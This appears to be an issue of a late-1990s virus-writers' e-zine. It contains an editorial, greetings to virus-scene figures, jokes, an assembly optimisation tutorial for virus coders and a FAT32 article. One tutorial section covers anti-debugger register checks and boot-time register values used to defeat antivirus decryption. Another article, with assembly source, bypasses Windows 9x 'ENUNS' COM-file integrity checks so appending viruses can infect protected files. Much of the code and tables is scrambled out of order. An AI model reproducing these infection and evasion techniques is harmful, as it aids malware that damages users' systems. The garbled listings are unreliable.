Yo, dudez and girl (yes gigabyte, this is you :) here is goes. After looong period of time, lot of announced release datez the day of the dayz is here. A small big Xmas present for all you affearing y2k breakdown, windoze NT security-holes-programers (like M$'s), avers whose terror of viruses raises from day to day, cut'n'paste coders, reverse engineers, and of course you - virus coderz. At first we have to appologize of late (really late) issue mainly due to undelivered stuff already promissed (not mentioning our lazyness and busyness). But we think a two and half years is just the right period for releasing mags. Sure not. But we are going to change our policy and for this reason most probably this is our second and last(!) mag released. We are not quitting but watch and be nicely surprised. (at least we hope ;-) As in the first issue we aren't aimed on quantity but on quality. So there aren't many viruses but a quality of articles and presented viruses will compense it excelently.
How to contact us To get in touch with us, you can contact us by e-mail on
[email protected] - all your email containing suggestions, questions or support are welcomed. Of course, you can contact us directly and/or presonally, if you know us :) Because we don't. For secured communication please use this pgp key - as you know - enemies are everywhere, do not trust anyone. But you can trust us. Secret government agencies are watching all around (echelon, for example), like these messages. So don't be trapped by some of them, take a apropriate countermeasures.
Our crew Article gathering/maitanance ............ Flush, Navrhar, MGL/SVL Graphics'n'design'n'mastering ................... Flush
Notes to first issue I really wondered that noone was able to solve puzzle in out first issue and didn't contacted us even with a note he read the "secret message". In fact, it wasn't quite secret - it is vissible on the main page, yes it is a hex-dump above the PCB. There are no cpu instructions but a message in hacker-sript.
Greetz Virus scene Benny / 29A - calm down dude and don't get busted, & thx 4 help. btw: how about not focusing on unimportant features on your page, but tu supply a real stuff (nothing in there now)
Prizzy / 29A - no matter how greatfully it sounds, but what it actually does :) (yer crypto thingy) Duke / [SMF] - changed to av side ??? good idea - you can make fortune from removing .bat viruses ;-))) Lord Julus - nice educational work, you outrunned us ;-) Metabolis QuantumG, Qark - its usual to greet VLAD members :) VicodinES good luck and take some books to shorten the time at holidays Chris Pile tell to Vic how it goes Virogen put your page up again Recoder what is updated on your vx page? Cicatrix keeep VDAT up to date .... go on with your work VirusBuster - r u henpecked? publish some details! :) Vecna congratz, Babylonia rules (but still some important things missing that beats you up) .... what 'll you bring as next? RAID definatelly, you should learn ASM :-P Peon you've completelly missed idea of Navrhar. That's why your disassembly is just nothing. sorry ;-) Kevin welcome back soon Antivirus scene dark_wade / Lynx wondering how a antivirus reseller (whose company was intented to bust vyvojar, for example!) can be opped on #virus ?! ????????? / ?????? thanx for interview l- aren't u too old for thing all around today? Eugene Kaspersky / AVP - if you wanna be a NAI rival, don't you need a banner on our site as well? Vesselin Bontchen / Fare u still alive? there is nearly noone now who can quarrel guys on Secure av scene
Thank you for paying attention (and for all the fish as well). Hope you found at least something interesting in our second and seems to be last issue. But we are not quitting, so keep watching our site. *-zine editors. P.S. Donations of spirits, beer or money are welcomed anytime.
Windows 95/98: "32-bit extensions and a graphical shell for a 16-patch to an 8-bit operating system originally coded for a 4-bit microprocessor, written by a 2-bit company that can't stand 1 bit of competition."
Whoever is the genius in the advertisement deptartment at Microsoft, they have done it this time. Anybody seen the IE ads on TV started in 1997? The one with a very effective choral music playing in the background? Well, the background music is the Confutatis Maledictis from Mozart's Requiem (Mass for the dead). And the words of the final blast of music which accompanies "Where do you want to go today?" are saying "confutatis maledictis, flammis acribus addictis..." which means "the damned and accused are convicted to flames of hell". Is this the right message for an ad?
Just beeing curious about f/win 4.21g I looked a little bit inside. And can you imagine my suprise? What do you think I found inside? (wwpack protection removed by cup386 ver 3.20) This nice piece of text has been found: * Welcome! If you read this, you have just give me the proof that my opinion about you is correct. You are one of these bastards that think cracking or stealing other people hard work is just the right way to go (like the authors of HMVS and PERFORIN seem to think). Well, I can`t stop you. But I watch and wait. And never forget... *
Another interesting piece of AV software is HMVS. When someone will take a look, there are here interesting things to see...
"There is no reason anyone would want a computer in their home." --Ken Olson, president, chairman and founder of Digital Equipment Corp., 1977
"But what...is it good for?"
--Engineer at the Advanced Computing Systems Division of IBM commenting on the microchip, 1968.
"I think there is a world market for maybe five computers." --Thomas Watson, chairman of IBM, 1943.
Unix is an operating system, OS/2 is half an operating system, Windows is a shell, and DOS is a boot partition virus. -- Peter H. Coffin
Q: Why do PCs have a reset button on the front? A: Because they are expected to run Microsoft operating systems.
The software said it requires Windows 95 or better, so I installed Linux
If NT is your answer, you don't understand the question
USER, n.: The word computer professionals use when they mean "idiot".
Where a calculator on the ENIAC is equipped with 18,000 vacuum tubes and weighs 30 tons, computers in the future may have only 1,000 vacuum tubes and weigh only 1 1/2 tons. -- Popular Mechanics, March 1949
C isn't that hard: void (*(*f[ ])( ))( ) defines f as an array of unspecified size, of pointers to functions that return pointers to functions that return void.
Why do programmers get Halloween and Christmas mixed up? Because OCT(31) == DEC(25)
PROGRAM - n. A magic spell cast over a computer allowing it to turn one's input into error messages.
Every asm coder wants to produce fast, short and efficient code. In asm language the things should be always pushed to the limits. Imagine, 58 bytes are enough to display color PCX file on the screen, 2 bytes can cause system restart etc... Especially virus coders should produce tight and effective code, it is not very pleasant thing to see unoptimized code of viruses. Sometimes the optimisation can spare couple hundred bytes - good reason to deal with this interesting topic.
Index 0. A. B. C. D. E. F. G. H. I. J. K. L. M. N. O. P. Q. R. S. T.
What is optimization Opening words Uninicialized data Register settings in various situations Putting 0 in register Test if register is clear Putting 0FFh in AH, 0FFFFh in DX and CX Test if registers are 0FFFFh Using EAX/AX/AL saves bytes MOV vs. XCHG 16 bit and 8 bit registers Registers and immediate operands Segment registers playground The string instructions DEC/INC vs SUB/ADD plus SI/DI SHR/SHL Procedures Multiple pops/pusheh Object code Structure of code Arithmetics with SIB (LEA)
0. What is optimization Process of optimization is process of doing domething more efficient, more reliable, faster or better and less buggy. This in programming means faster execution of program, reducing of its size etc. Coding of viruses is mostly programming in assembly, thus producing of fast and short code. But everything can be done better, even assembly code can be coded shorter. Some tips are included in this tutorial.
A. Opening words There are some things, you should really avoid in your programs, doesn't matter if it is virus or some utility. First of all remove all unnecessary code - in a good program there should be no NOPs. Another good tip is examining the jumps in program - try to find out, if some JMP NEAR can not be replaced by JMP short. Good test is trying to remove directive jumps in beginning of the source code. Forward refferences are bad for optimization they produce unnecessary NOPs in some cases. B9 0014 90 14*(??) =0014
mov cx, buffer_size buffer: db 20 dup (?) buffer_size equ $-buffer
Better result we get with multiple passes (/m switch): B9 0014 14*(??) =0014
mov cx, buffer_size buffer: db 20 dup (?) buffer_size equ $-buffer
Very bad idea idea is calculating in the code some weird value which could be calculated directly in the source code using operands and parenthesses.
B. Uninitialized data Viruses often need some memory for e.g. loading original EXE header. This could be done with following code (similar code could be often seen in viruses) call read_header call process_it ..... buffer: db 18 dup (?) ..... read_header: mov ax, 4200h xor cx, cx cwd int 21h mov cx, 18 mov dx, offset buffer mov ah, 3f int 21h
Well, as you can seek if you place the uninicialized data in your virus somewhere inside the body size of the resulting code is larger as necessary. Therefore avoid placing uninicialized variables, structures or buffers in the code. All the mentioned things should be placed on the heap. To see example how it should not look like, just take a look on your COMMAND.COM - in the one of DOS 6.22 as well as of Windows 98 you will seek a lot of zeroes near the EOF. That code is especially poor optimized. Try to use something like virus_code_end label near buffer: db 1024 dup(?)
C. Register settings in various situations There are some interesting situations like executing some EXE or COM file or booting the computer. As one can expect register setting is not random but very deterministic. Virus authors can take advantage from this default setting by testing some registers for its "on run" value. Take a look in tables 1 and 2 for the values which are set by MS-DOS for us. Table 1 - COM and EXE files reg default value AX 0000h (usualy)
reg default value BP 091Ch
Table 2 - At the boot time * reg default value AX 0201h
reg default value BP 7C00h
BX CX DX SI DI
0000h 00FFh PSP IP SP
SP DS ES SS CS
SP PSP PSP SS CS (PSP in COM)
BX CX DX SI DI
7C00h 0001h 0080h 0005h 7C00h
SP DS ES SS CS
7BFCh 0 0 0 0
* as to Ender's tests, this might varry from bios to bios, however it remains constant for one machine (or bios version). You
can use it as some sort of snapshot taken at first boot time, and then used for example in decryptor. Antivirus will not be able at all to guess these numbers without reboot and it will not be able correctly decrypt poly virus in mbr. (Quite nice Ender's idea, isn't it?)
As we all know Turbo Debugger sets all general registers to 0. When we some perform operation like xor ... cmp jne ...
cx, bp some code not affecting cx cx, 93Eh TD_is_here no debuger here
This way virus can easy escape from debugger. But on good writtten emulation system we are without any chance because they (AV) know we know and they are ready. But we can easy top all the wannabies trying to "research" our virus and give them the fun they want to have.
D. Putting 0 in register 1. Clearing whatever register The usual way of clearing a register is B8 0000
mov
ax, 0
; costs 3 bytes
33 C0 2B C0
xor sub
ax, ax ax, ax
; is more optimised ; only 2 bytes !
This above mentioned approach can be used every time you need. Under Win32 is the above mentioned optimization more efficient, just take look at following piece of code: B8 00000000 33 C0 2B C0
mov eax, 0 xor eax, eax sub eax, eax
; costs 5 bytes ; costs only 2 bytes
Now we will take a sneak peek on the specific situations. 2. Clearing AH Let's assume the situation we need to clear the AH register. Generally we will do it this way: B4 00 2A E4 32 E4
mov sub xor
ah, 0 ah, ah ah, ah
; cost 2 bytes in DOS ; is the same
but if the AL walue is less than 80h we can save a byte (DOS) 98
cbw
while under Windoze the cbw will be assembled as 66 98
cbw
3. Clearing DX We use the same approach as with AH. If value in AX <8000h we can use
99
cwd
to clear the DX 4. When is CX clear? There is absolutely useless use code like .... loop some_label xor cx, cx
; or even worse - mov cx, 0
because after the exit from some loop (i do not mean hard or conditional jump out of the loop) the CX register is already cleared as well as after the REP ??? operations.
E. Test if register is clear 1. General situation Normal, uneducated coder will use this code: 3D 0000 83 FB 00
cmp cmp
ax, 0 bx, 0
; which takes 3 bytes
ax, ax bx, bx
; this takes only 2 bytes
but hard core programmer will for sure use 0B C0 0B DB
or or
if the value can be discarded we can save another byte 48 4B
dec dec
ax bx
; this is only 1 byte
will set for us sign flag if the register is zero. Situation under Windoze is similar: 83 F8 00 0B C0 0B C0 66| 0B C0
cmp or or or
eax, 0 eax, eax eax, eax ax, ax ; this is not default ; operand size
2. The CX register In x86 processors CX register is used as counter, the instruction set supports this use. E3 ??
jcxz
some_label
jumps when CX is zero, we do not need comprare CX with zero. But especially demo coders should pay attention to the fact, this instruction is relatively slow.
F. Putting 0FFh in AH, 0FFFFh in DX and CX If AL > 80h, cbw sets AH to 0FFh. If AX > 8000h, cwd put OFFFFh in DX. As for CX, after the exit from the loop is this register set to 0. .... loop some_label dec cx ; CX is here 0 this, sets it to 0FFFFh.
G. Test if registers are 0FFFFh If we need to test if the 2 registers hold both 0FFFFh and value of one is not needed afterwards, we can easy do it with e.g.
23 C3 40 74 ??
and inc jz
ax, bx ax a
cmp jnz cmp jzn
ax, 0ffffh a bx, 0ffffh a ; making 10 bytes
; 5 bytes altogether
instead of 3D 75 83 75
FFFF ?? FB FF ??
H. Using EAX/AX/AL saves bytes Opcodes for some types of instructions are shorter, when you use AX or AL instead of any other registers. This is the case of instruction like: MOV reg,mem A1 8B A0 8A 8A
0084 1E 0084 0084 26 0084 3E 0084
mov mov mov mov mov
ax, bx, al, ah, bh,
mov mov mov mov mov
word word byte byte byte
cmp cmp cmp cmp cmp
ax, bx, al, ah, bh,
word word byte byte byte
ptr ptr ptr ptr ptr
ds:[84h] ds:[84h] ds:[84h] ds:[84h] ds:[84h]
; 3 bytes ; 4 bytes ; 3 bytes ; 4 bytes each
MOV mem,reg A3 89 A2 88 88
0084 1E 0084 0084 26 0084 3E 0084
ptr ptr ptr ptr ptr
ds:[84h], ds:[84h], ds:[84h], ds:[84h], ds:[84h],
ax bx al ah bh
; 3 bytes ; 4 bytes ; 3 bytes ; 4 bytes each
CMP reg,value 3D 81 3C 80 80
04D3 FB 04D1 22 FC 22 FF 22
0D304h 0D104h 34 34 34
; 3 bytes ; 4 bytes ; 2 bytes ; 3 bytes each
I. MOV vs. XCHG Moving value from one register to another can be replaced with XCHG but only in cases the value in one of source register is not important. AX register as expected is here better solution too. 8B C3 93
mov xchg
ax, bx ax, bx
; 2 bytes ; 1 byte
Following code is of equal size 8A C3 86 C3
mov xchg
al, bl al, bl
8A E6 86 E6
mov xchg
ah, dh ah, dh
; 2 bytes all
but you can even enlarge the code with : A1 0080
mov
ax, word ptr ds:[80h] ; 3 bytes
87 06 0080 86 06 0080
xchg xchg
ax, word ptr ds:[80h] ; 4 bytes al, byte ptr ds:[80h] ; this is bad
J. 16 bit and 8 bit registers I doubt there is any non-newbie coder who will use code ala B0 10 B4 20
mov mov
al, 10h ah, 20h
which takes 4 bytes, but doing the code above at once with B8 2010
mov
ax, 2010h
takes only 3 bytes.
K. Registers and immediate operands Immediate operands cost more bytes than use of registers. Just looka at the example below: C6 06 010C 00 88 3E 010C A2 010C
mov mov mov
byte ptr [10Ch], 0 ; 5 bytes byte ptr [10Ch], bh; 4 bytes byte ptr [10Ch], al; 3 bytes
L. Segment registers playground 1. Avoid using not default segments If you use not default segmet register for the operation, segment prefix will be generated, which add 1 byte to the size of the code. 3E: 8B 86 0100 8B 84 0100
mov mov
ax, word ptr ds:[100h][bp] ax, word ptr ss:[100h][bp]
2. Moving from segment register to segment register We can't move directly value from one segment register to another. It has to be coded ala 8C C8 8E D8
mov mov
ax, cs ds, ax
push pop
cs ds
with length of 4 bytes but 0E 1F
takes only 2 bytes
M. The string instructions Intel prepared for use instructions like LODS, STOS, MOVS, SCAS, CMPS to handle large amount of data. One has to know what this instructions do. Below are instruction and it equivalents. AC 8A 04
lodsb mov
al, byte ptr ds:[si]
AD 8B 04
lodsw mov
ax, word ptr ds:[si]
66| AD 66| 8B 04
lodsd mov
eax, dword ptr ds:[si]
LODS type instruction save 1 byte in comparision with move. AA 26: AB 26: 66| 66|
88 05 89 05 AB 26: 89 05
stosb mov stosw mov stosd mov
byte ptr es:[di], al word ptr es:[di], ax dword ptr es:[di], eax
STOS type save 2 bytes in comparision with move. Therefore MOVS instruction save 3 bytes (is the same as
LODS followed by STOS). AE 26: 3A 05
scasb cmp
al, byte ptr es:[di]
AF 26: 3B 05
scasw cmp
ax, word ptr es:[di]
66| AF 66| 26: 3B 05
scasd cmp
eax, dword ptr es:[di]
SCAS type instruction save 2 byte in comparition with CMP. CMPS instruction does the same as LODSB/LODSW/LODSD CMP AL/AX/EAX, byte/word/dword ptr ES:[DI]
thus we save 3 bytes with CMPS. We dont have to omit REP prefixes - using this 1 byte sized instruction we can do miracles almost at no costs. In addition after REP ??? is CX set to 0
N. DEC/INC vs SUB/ADD plus SI/DI Incrementing or decrementing 16bit register is only 1 byte in size. It is more efficient that INC/DEC 8 bit register, or adding or subtracting 1 from some adress or register. 40 FE C0
inc inc
ax al
4A FE CE
dec dec
dx dh
2D 0001 05 0001
sub add
ax, 1 ax, 1
83 2E 0080 01 FF 0E 0080
sub dec
word ptr ds:[80h], 1 word ptr ds:[80h]
83 06 0080 01 FF 06 0080
add inc
word ptr ds:[80h], 1 word ptr ds:[80h]
Even if we need to add/sub 2 from register inc/sub twice is 1 byte shorter. For SI/DI if AX doesn't matter we can use some of string instruction for INC/DEC (depending on direction flag).
O. SHR/SHL SHR/SHL instructions can be used for division/multipliing by 2/4/8 etc.. instead of DIv/MUL instructions. While by DIV/MUL we have to fill register with needed value, we can instead of B1 02 F6 E1
mov cl,2 mul cl
; 4 bytes in total
use just C0 E0 02
shl al,2
for multiply al with 4 and save a byte here. If we are multiplying just by 2, we can save 2 bytes because D0 E0
has size only 2 bytes.
P. Procedures
shl al,1
If the some code is used over and over again it is very clever to put such a piece of code in procedure. It could save some valuable bytes, but we have to say, in other cases this could also add some bytes to code. How could you decide if putting the code in procedure can save bytes ? Let the number of repeating use of some piece of code be N, its size will be S, the number of saved or lost bytes will be B. When the code is not part of procedure, its total size will be N*S. But when we put the code in the procedure, the resulting size of code will be ( S+1 )
+
N*3
+
A
this should be understand as (ret + the size of code) + N*3 bytes for each call + difference
And the resulting equation is N*S N*S - 3*N - (S+1) N*(S-3) - S - 1
= (S+1) + 3*N + A = A = A
from the formula above you can clearly see, that every repeated code which size is 3 bytes or less can not be replaced by procedure in the process of optimisation. When we know the size of code (which should be at least 4 bytes) and the number of repeating we can estimate the number of saved bytes. So, for code with length of 4 bytes we save 1 bytes, if the code is repeated 6 times and put in the procedure. Next thing you can do with procedures, is using multiple entry points for the same procedure.
Q. Multiple pops/pusheh Sometimes situation arises where you have need to repeat lot of pushes or pops couple of times. If you thinking goes in the direction "procedure" it goes the right way. But with push/pop instruction is one little problem - the instruction manipulates stack pointer as well as the CALL does. But the instruction set provides solution - the JMP register instruction. We can handle multiple pushes/pops like this call ... ... push_reg: pop push push push push jmp
push_reg
si ax cx dx bx si
; pop return adress
; this does what ret normally does
R. Object code Some opcodes are in some memory models aren't accesible. Therefore to use some workaround. Most typical use of object code in virus if famous return to original dos handler: back dosadr
db dd
9ah ?
; this is for JMP FAR PTR ; and here comes the adress
Another nice use of object code is let's say in decryptor ala: xor
ax, key
but as the every copy of virus will have different key, we code this instruction as key:
db dw
35 ?
which will work perfectly.
S. Structure of code This is really what is optimisation about. If you structure your code good you can save lot of bytes. If you are using lot of procedures, do not forget to check input and outpot registers. Sometimes it could be valuable to use register, which cost less bytes to handle in procedures. As and example for good structured code, here look at part of INT 21h handler for some hypotetic virus. Pay attention to the use of call instruction here: 86 C4 E8 0007
xchg call
40 021Ar 3E 0458r 00
db dw db dw db
5F
jump_there: pop
al,ah jump_there
40h offset write 3eh offset close 0 di
; end of table ; pointer to ; table begin
search: 80 74 AE 74 AF EB
3D 00 08 03 F5
cmp je scasb je scasw jmp
byte ptr ds:[di],0 exit ; table end ?
jmp
word ptr ds:[di] ; jump to ; function
handle
; AL = AH ? ; DI = DI + 2
short search
handle: FF 25 exit:
Size of the code above is 26 bytes. Every added handled function adds just 3 further bytes. But when we use this virus typical sequence of CMP, JE/JNE, JMP the it will look like: 80 FC 40 75 03 E9 022D
cmp jne jmp check_3e:
ah, 40h check_3e infect
thus we have to count at least 8 bytes for every single handled function. If we want to hadle 10 functions, it will be as much as 80 bytes. Structured coding from previous example will fit the same function in only (26+3*8) = 50 bytes. 30 bytes saved, do i have to further explain all the pluses structured coding can bring to you?
T. Arithmetics with SIB (LEA) There is another way on i386+ to simplify more complicated arithmetical operations. A SIB displacement of instruction (used for complex memory access) can be used for arithemtics as well using LEA instruction. SIB means: Scale, Index, Base which is principle of memory accesss in general form: 89 84 CB 12345678
mov
[ecx*8+ebx+12345678h], eax
Scale is register (any 32bit) multiplied by 1, 2, 4 or 8; Index is another 32bit register, and finally Base is a raw offset. Base is a 32bit value as well, that takes another 4 bytes, but it might be used also without this constant. You can use if for aritmetical operations, even more it is faster than comparisonable equivalents using multiplying or shifts, and you can perform a mutliplication for even non-standard values, like eax mul 9, for example: 8D 04 C0
lea
eax, [eax*8+eax]
As you can see, this lea-trick can be used in many circumstances, and I'll not list them all here, of cos.
Hope this little introduction helps you with some ideas, but you surely know: "truth is out there" - you need to optimize your code in more general context, not only on instruction base, but on register usage optimizing and stack usage as well, and there are many other things that can't be decribed in such a general way. May be it is for another article. But for now, go ahead and won't your code be pesimised...
Introduction In the old goodtimes there were nothing easier as infecting COM file. But the Microsoft went to market with his Windoze 9x series of betas. This has changed some COM files and near the EOF we started to see string 'ENUNS' followed by word with various value. This is apparently some kind of checksum or other security shit. Many virus coder solved the this problem simply by avoiding the infection of such a modified COM files.
Research part But as we all know, Microsoft is lame company and its programmers are morons. So let's take a closer look what does such a ENUNS file in action. We will pick up a handy and short file from directory C:\WINDOWS\COMMAND - file choice.com If we 'll play a little bit with hex editor and we 'll add some extra bytes to the end of the file, after running CHOICE.COM without any command line parameters, we will see [ , ]?
instead of the usual [Y,N]?
This means - file is corrupted ... Let's start debuging this file. After couple of jumps and calls we land in following code cs:0B27 cs:0B28 cs:0B29 cs:0B2A cs:0B2C cs:0B2F cs:0B32
1E 06 1F 8B 83 B8 CD
D7 C2 03 00 3D 21
push push pop mov add mov int
ds es ds dx, di dx, 3 ax, 3D00h 21h
The code above opens the file which is run (choice.com) cs:0B34 cs:0B35 cs:0B37 cs:0B39 cs:0B3D cs:0B40 cs:0B41 cs:0B44 cs:0B48 cs:0B4A cs:0B4B
1F 72 8B 89 E8 9C B8 8B CD 9D 72
pop 3C jb D8 mov 1E 77 05 mov 3F 00 call pushf 00 3E mov 1E 77 05 mov 21 int popf 2C jb
ds error bx, ax handle, bx test_ENUNS ax, 3E00h bx, handle 21h loc_0_B79
Call to the test_ENUNS seem to be quit important. Closer look shows what this procedure does: cs:0B7F cs:0B80 cs:0B82 cs:0B84
06 33 C9 33 D2 83 EA 07
push xor xor sub
es cx, cx dx, dx dx, 7
cs:0B87 cs:0B8A cs:0B8D cs:0B8F cs:0B92 cs:0B94 cs:0B97 cs:0B9A cs:0B9E cs:0BA1 cs:0BA5 cs:0BA7
83 B8 CD B9 03 83 A3 89 B8 8D CD 72
D9 02 21 07 C1 D2 80 16 00 16 21 1A
00 42 00 00 05 82 05 3F 92 05
sbb mov int mov add adc mov mov mov lea int jb
cx, 0 ax, 4202h 21h cx, 7 ax, cx dx, 0 size_lo, ax size_hi, dx ax, 3F00h dx, ds:592h 21h bad_handle
The routine seek to EOF-7 and read last 7 bytes of the file to some buffer. Filesize is saved on this occasion. cs:0BA9 81 3E 95 05 4E 53cmp cs:0BAF 75 12 jnz
word_0_595, 'SN' bad_handle
Location EOF-4 is checked for presence of string 'NS'. cs:0BB1 cs:0BB4 cs:0BB8 cs:0BBC cs:0BBE
A1 8B 8B 2B 83
97 16 0E D0 D9
05 80 05 82 05 00
cs:0C07 89 0E 80 05 cs:0C0B 89 16 82 05
mov mov mov sub sbb
ax, dx, cx, dx, cx,
checksum size_lo size_hi ax 0
mov mov
size_lo, cx size_hi, dx
Word at location EOF-2 is subtracted from the file size and result is stored. cs:0C0F cs:0C12 cs:0C15 cs:0C17 cs:0C1B cs:0C1F cs:0C21 cs:0C24 cs:0C26 cs:0C29 cs:0C2A
BE E8 73 8B 8B 33 E8 72 E8 07 C3
01 16 0F 0E 16 F6 07 03 7F
00 00 80 05 82 05 00 00
mov call jnb mov mov xor call jb call pop retn
si, 1 sub_0_C2B loc_0_C26 cx, size_lo dx, size_hi si, si sub_0_C2B loc_0_C29 sub_0_CA8 es
From our (virus) point of the view is decising the call to cs:0xC2B. cs:0C2B cs:0C2C cs:0C2D cs:0C30
51 52 B8 00 42 CD 21
push push mov int
cx dx ax, 4200h 21h
File pointer is moved to the location (filesize-(word at EOF-2)) cs:0C32 cs:0C35 cs:0C37 cs:0C3B cs:0C3D cs:0C3F cs:0C41
B9 B4 8D CD 72 3B 75
10 00 3F 16 92 05 21 37 C1 33
mov mov lea int jb cmp jnz
cx, 10h ah, 3Fh dx, ds:592h 21h loc_0_C76 ax, cx loc_0_C76
Read form inside the file is performed. cs:0C43 A1 9D 05 cs:0C46 3D 4E 53 cs:0C49 75 2B
mov cmp jnz
ax, word_0_59D ax, 'SN' loc_0_C76
Location inside the file is checked for presence of string 'NS'. This is what the program does with the magic 'ENUNS' shit. Quit lame and interesting at the same time. Well as we know what the does, we should try to create some workaround.
What do we need? There are two requests for elegant solution of the problem 1. User should see at the EOF-7 the string 'ENUNS' followed by word containing "magic value". 2. File has to pass its internal controll routine.
Solution We take common non-overwriting appending COM infector. If we choose some ENUNSed targed and we will infect it in normal way, the proggy with virus on its end will have no 'NS' at EOF-4. In the very rare case it will have 'NS' there, word at EOF-2 sends the file pointer somewhere in deep space 9 and the next check will fail. Therefore solution of the problem is 1. Read last 7 bytes of file to some buffer 2. Infect the file as usual 3. Handle ENUNS protection As we need to have at least 'NS' at EOF-4, in the line of our elegant solution we will add there 'ENUNS' string. Then we need to adapt the word at EOF-2 in such a way it will point to the location it pointed before the file was infected. The word located at EOF-2 is subtracted from file size - it could be expressed as follows uninfected situation: X = filesize - (word at EOF-2) but when the file is infected the situation is X + virus size + added code = filesize + virus size +added code - (word at EOF-2) Resulting pointer is now "somewhat" incorrect from our viral point of the view. This dramatic equation is easy to solve just by moving some shit from left to right side of the equation... X = filesize + virus size +added code -(word at EOF-2+ virus size+ added code) note: under the term "added code" you should understand our 2nd 'ENUNS??' string.
Dear readers, the solution for the ENUNS problem is just to copy the last 7 bytes from the target file to the end of the virus body with only one change - to the value of last word in the file we simply add the size of all appended code including our duplicite ENUNS?? string. And here comes the demonstration of the above mentioned solution.
ENUNS.ASM
model tiny codeseg org 100h ; ; ; ; ; ; ; ; ; ; ; ; CR LF
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³Diz is demonstation proggy to show easy way to handle Micro$oft's³ ³ENUNS protection of COM files from the viral point of the view ³ ³ ³ ³To compile the file use Borland's Turbo Assembler with following ³ ³switches: ³ ³ tasm enuns.asm ³ ³ tlink /t enuns.obj ³ ³ ³ ³The resulting enuns.com should have exactly 512 bytes. Exactly 1 ³ ³sector in size :P ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ equ equ
0Dh 0Ah
start: mov lea int
lea int mov or
ah, 1Ah dx, DTA 21h
mov ah, 9 dx, open_message 21h al, byte ptr ds:[80h] al, al jnc path lea dx, path_miss jmp short @@2
; own DTA (so we don't screw _argv)
; got parameter ?
path: cbw xchg ax, si mov byte ptr ds:[81h+si], '$' lea dx, assumed mov ah, 9 int 21h mov dx, 81h int 21h mov skip_space: mov cmp jne inc jmp
; print path+filename
byte ptr ds:[81h+si], 0 di, dx byte ptr [di], 20h search dx short skip_space
; avoid space in a front of path
search: mov ah, 4Eh int 21h jnc open_file lea dx, not_found @@2: jmp short @@1 open_file: mov ax, 3D02h int 21h jnc open_ok lea dx, open_error
; search the file ; print error message
; open file
ENUNS.ASM
@@1: jmp open_ok: xchg
short put_msg
; print error message
ax, bx
mov push mov mov int
ax, 4202h ax dx, 0FFF9h cx, 0FFFFh 21h
; seek 2 ENUNS
mov lea mov int
ah, 3Fh dx, enuns cx, 7 21h
; read it
add
word ptr [enuns+5], xtns + 7
pop cwd xor int
ax cx, cx 21h
; seek 2 end
mov lea mov int
ah, 40h dx, demo cx, xtns + 7 21h
; write additional data
mov int int
ah, 3Eh 21h 20h
mov int int
ah, 9 21h 20h
put_msg:
open_message: db 'ENUNS workaround demo by MGL',CR,LF,CR,LF,'$' path_miss: db 'No path specified !',CR,LF,CR,LF,'$' assumed: db 'Target file assumed : $' not_found: db 'File not found !$' open_error: db CR,LF,'Error opening target file!',CR,LF,'$' demo: db CR,LF,'ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿' db CR,LF,'³This text is added to the file just for the demonstration³' db CR,LF,'³of Micro$oft lameness in design of ENUNS protection ³' db CR,LF,'ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ' xtns equ $ - offset demo enuns db 7 dup (?) DTA: end start
Did you ever take a care about FAT filesystem? Did you experienced over new one that Windows'95 brings? I played with old FAT a long time ago, I did a lots of work with it, like disk recoveries, crashed disks, etc, even repairing disk by phone (filling in all numbers computed in head for partition and boot by talking via phone). I wrote several FAT emulators r/w (guess for what reasons ;-), some recovery utilities, disk swapping tools (changing internal dos/windows stuff for swapping disks, booting from non-primary partitions, etc), on-fly mounting an unmounting disk utils for dos/win. I would say I was quite familiar with FAT. But things getting changed. I've installed a new Windows on my computer some time ago (you have to do so in current contitions), swapped to FAT32. It is slower a bit, but functional. Before I have my old (today I would say "really old") 1GB disk partitioned into 128MB partitions for having 2kB clusters. I used to have lots of small files, and not to have a big space wasting I had many logical disks on that disk. With FAT32 all these things are forgotten. But even in that time I never checked new disk structures. But nice spring evening comes, and CIH does its job. Not on my disk, of'coz as I play with viruses for more than 8 years. I don't have any active virii on my computer - for that reasons I use best avir 'round the globe hiew ;-). Well but friend of mine called me that his office disk crashed (and even his cheef's disk and others as well) and asked me for help. "CIH" - my first idea was. Of course I was right. Moreover, he wasn't the only one who asked me for help at that time. And I get experienced with FAT32 immediately.
Well, let's have a look what is changed under FAT32. Of course, cluster numbers are 32bit. What an advantage. However, as upper 4 bits of cluster number are reserved, gives at maximum 268,435,456 clusters. This makes FAT very long, and slows down a DOS a lot, because it can't load all data into its buffers at once and forgots first entries it loads - and it has to load it again, forgetting newer entries, then to load newer once again: if you are familiar with caching algorhitms of victims - it is a classical example of fifobug. I'll divide my tour into some logical sections, covering what is new in all structures. Most of changes are determined by need of accessing big disks. Really big disks. It has something to deal with int13 addressspace, bioses, and so on.
Partition table There are two main changes. At first, the code itself is changed for supporting a new accessing methods of huge disks. You have to think about of adressing space for accessing sectors on disc. May be some of you remember how the limit of 512MB was famousely broken. Maximum coordinates some time ago were: 6 bits for sector number (starting from 1) - max 63 sectors 6 bits for head number (starting from 0) - max 64 heads however this is slightly implementation dependent. In general description whole DH register used with 13/02 (int 13, ah=02) should contain head number which allows 256 heads, but Award BIOS uses highest two bits of DH for highest track bits, and Ami as well as far as I know. 12 bits for cylinder (starting from 0) - max 4096 cyls (or tracks) which also performs some kind of incompatibility, as original documentation refers 10 bits for tracks (max 1024) - CH plus 2 highest bits in CL, but most bioses I know uses also highest two bits of DH as
